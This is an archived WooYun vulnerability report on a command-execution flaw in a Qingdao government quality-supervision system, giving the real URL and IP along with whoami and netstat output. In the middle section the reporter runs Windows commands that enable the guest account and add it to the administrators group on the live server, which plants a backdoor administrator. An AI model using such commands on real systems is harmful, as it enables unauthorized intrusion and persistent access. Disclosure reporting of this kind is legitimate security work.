当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128859

漏洞标题:青岛市质量监督局某系统平台存在命令执行漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 朱元璋

提交时间:2015-07-24 22:03

修复时间:2015-09-12 09:40

公开时间:2015-09-12 09:40

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-29: 厂商已经确认,细节仅向厂商公开
2015-08-08: 细节向核心白帽子及相关领域专家公开
2015-08-18: 细节向普通白帽子公开
2015-08-28: 细节向实习白帽子公开
2015-09-12: 细节向公众公开

简要描述:

RT

详细说明:

地址http://60.209.238.28:8080/qdqts/productInfoBarCodeManagerInit_barCodeInfoInit.action存在命令执行漏洞

0.png


whoami

win-tockf0m2rsb\administrator


netstat -ano

????
  ??  ????          ????        ??           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       524
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       352
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       1908
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       3588
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       11216
  TCP    0.0.0.0:8073           0.0.0.0:0              LISTENING       524
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       11216
  TCP    0.0.0.0:9009           0.0.0.0:0              LISTENING       14512
  TCP    0.0.0.0:9090           0.0.0.0:0              LISTENING       14512
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       708
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       296
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       824
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       616
  TCP    0.0.0.0:49160          0.0.0.0:0              LISTENING       788
  TCP    0.0.0.0:49161          0.0.0.0:0              LISTENING       3668
  TCP    0.0.0.0:58978          0.0.0.0:0              LISTENING       14396
  TCP    0.0.0.0:58979          0.0.0.0:0              LISTENING       14396
  TCP    0.0.0.0:62105          0.0.0.0:0              LISTENING       14200
  TCP    0.0.0.0:62106          0.0.0.0:0              LISTENING       14200
  TCP    0.0.0.0:63825          0.0.0.0:0              LISTENING       7840
  TCP    0.0.0.0:63826          0.0.0.0:0              LISTENING       7840
  TCP    127.0.0.1:8005         0.0.0.0:0              LISTENING       11216
  TCP    127.0.0.1:8043         0.0.0.0:0              LISTENING       524
  TCP    127.0.0.1:9005         0.0.0.0:0              LISTENING       14512
  TCP    192.168.100.99:3389    111.161.36.199:19156   ESTABLISHED     3588
  TCP    192.168.100.99:3389    171.111.40.118:1929    ESTABLISHED     3588
  TCP    192.168.100.99:8080    171.111.40.118:1890    CLOSE_WAIT      11216
  TCP    192.168.100.99:8080    171.111.40.118:2197    FIN_WAIT_2      11216
  TCP    192.168.100.99:8080    171.111.40.118:2216    ESTABLISHED     11216
  TCP    192.168.100.99:51010   119.167.248.138:80     CLOSE_WAIT      6396
  TCP    192.168.100.99:52548   192.168.8.10:1433      ESTABLISHED     10736
  TCP    192.168.100.99:52550   192.168.8.10:1433      ESTABLISHED     10736
  TCP    192.168.100.99:53435   111.206.79.100:80      ESTABLISHED     12460
  TCP    192.168.100.99:54384   192.168.8.10:1433      ESTABLISHED     10736
  TCP    192.168.100.99:54387   192.168.8.10:1433      ESTABLISHED     10736
  TCP    192.168.100.99:56410   192.168.8.10:1433      ESTABLISHED     11216
  TCP    192.168.100.99:56847   118.212.135.160:80     CLOSE_WAIT      14396
  TCP    192.168.100.99:56877   222.132.5.87:80        CLOSE_WAIT      9024
  TCP    192.168.100.99:56966   218.58.206.32:80       CLOSE_WAIT      7840
  TCP    192.168.100.99:56980   192.168.8.10:1433      ESTABLISHED     11216
  TCP    192.168.100.99:56985   192.168.8.10:1433      ESTABLISHED     11216
  TCP    192.168.100.99:56986   192.168.8.10:1433      ESTABLISHED     11216
  TCP    192.168.100.99:56993   182.118.59.187:80      ESTABLISHED     5980
  TCP    192.168.100.99:57000   192.168.8.10:1433      ESTABLISHED     11216
  TCP    192.168.100.99:57003   111.206.81.72:80       ESTABLISHED     5980
  TCP    192.168.100.99:58971   192.168.8.10:1433      ESTABLISHED     16344
  TCP    192.168.100.99:58972   192.168.8.10:1433      ESTABLISHED     16344
  TCP    192.168.100.99:58973   192.168.8.10:1433      ESTABLISHED     16344
  TCP    192.168.100.99:58974   192.168.8.10:1433      ESTABLISHED     16344
  TCP    192.168.100.99:58975   192.168.8.10:1433      ESTABLISHED     16344


有亮点,呵呵
net user guest /active:yes

命令成功


net localgroup administrators guest /add

命令成功


直接进入你们家的服务器咯

1.jpg

漏洞证明:

2.jpg

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-07-29 09:38

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无